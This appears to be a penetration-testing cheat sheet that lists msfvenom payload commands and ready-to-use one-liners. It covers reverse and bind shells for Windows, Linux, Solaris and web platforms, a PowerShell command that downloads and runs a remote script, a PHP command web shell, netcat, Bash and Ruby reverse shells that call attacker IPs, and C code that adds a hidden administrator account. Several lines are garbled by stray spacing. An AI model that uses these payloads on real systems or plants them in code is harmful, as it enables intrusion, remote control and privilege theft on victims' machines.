WEB SHELLS
/usr/share/webshells
MSFvenon Format:-
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
One can also use the -a
to specify the architecture or the --platform
WINDOWS
Reverse Shell
Copy msfvenom -p windows/shell/reverse_tcp LHOST= < I P > LPORT= < POR T > -f exe > shell-x86.exe
Copy msfvenom -p windows/shell_reverse_tcp LHOST= < I P > LPORT= < POR T > -f exe > shell-x86.exe
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST= < I P > LPORT= < POR T > -f exe > shell-x64.exe
Copy msfvenom -p windows/shell_reverse_tcp LHOST= < I P > LPORT= < POR T > -f exe > shell-x64.exe
Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST= < I P > LPORT= < POR T > -f exe > shell.exe
Bind Shell
Copy msfvenom -p windows/meterpreter/bind_tcp RHOST= < I P > LPORT= < POR T > -f exe > bind.exe
Create User
Copy msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
CMD Shell
Copy msfvenom -p windows/shell/reverse_tcp LHOST= < I P > LPORT= < POR T > -f exe > prompt.exe
Execute Command
Copy msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD= "net localgroup administrators shaun /add" -f exe > pay.exe
Encoder
Copy msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Embedded inside executable
Copy msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
LINUX
Reverse Shell
Copy msfvenom -p linux/x86/shell/reverse_tcp LHOST= < I P > LPORT= < POR T > -f elf > shell-x86.elf
Copy msfvenom -p linux/x86/shell_reverse_tcp LHOST= < I P > LPORT= < POR T > -f elf > shell-x86.elf
Copy msfvenom -p linux/x64/shell/reverse_tcp LHOST= < I P > LPORT= < POR T > -f elf > shell-x64.elf
Copy msfvenom -p linux/x64/shell_reverse_tcp LHOST= < I P > LPORT= < POR T > -f elf > shell-x64.elf
Bind Shell
Copy msfvenom -p linux/x86/meterpreter/bind_tcp RHOST= < I P > LPORT= < POR T > -f elf > bind.elf
SunOS (Solaris)
Copy msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
Web-Based Payloads
PHP
Reverse shell
Copy msfvenom - p php / meterpreter_reverse_tcp LHOST =< IP > LPORT =< PORT > - f raw > shell . php
cat shell . php | pbcopy && echo '<?php ' | tr - d '\n' > shell . php && pbpaste >> shell . php
Copy php - r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Copy <? php
system ( 'nc.exe -e cmd.exe 10.10.10.5 4444' )
?>
Copy <? php system ( $_REQUEST[ "cmd" ] ) ; ?>
ASP/x
Reverse shell
Copy msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f aspx > reverse.aspx
JSP
Reverse shell
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f ra w > reverse.jsp
WAR
Reverse Shell
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port ) -f war > reverse.war
NodeJS
Copy sfvenom -p nodejs/shell_reverse_tcp LHOST= ( IP Address ) LPORT= ( Your Port )
Script Language payloads
Perl
Copy msfvenom -p cmd/unix/reverse_perl LHOST= ( IP Address ) LPORT= ( Your Port ) -f raw > reverse.pl
Python
Copy msfvenom -p cmd/unix/reverse_python LHOST= ( IP Address ) LPORT= ( Your Port ) -f raw > reverse.py
PHP
Copy php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Copy <?php
system('nc.exe -e cmd.exe 10.10.14.13 4444')
?>
Copy <?php system($_REQUEST["cmd"]); ?>
BASH
Copy bash -i >& /dev/tcp//9999 0>&1
RUBY
Copy ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
NETCAT
Copy nc -e /bin/sh 10.0.0.5 1234
Copy #OpenBSD netcat doesn't support -e flag. You can even try BASH 1-liner
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Adduser.c
On the Attacking machine compile it first: x86_64-w64-mingw32-gcc adduser.c -o adduser.exe, then transfer it to Victim
Copy # ADDUSER.C
#include <stdlib.h>
int main ()
{
int i;
i = system ( "net user test password123! /add" ) ;
i = system ( "net localgroup administrators test /add" ) ;
return 0 ;
}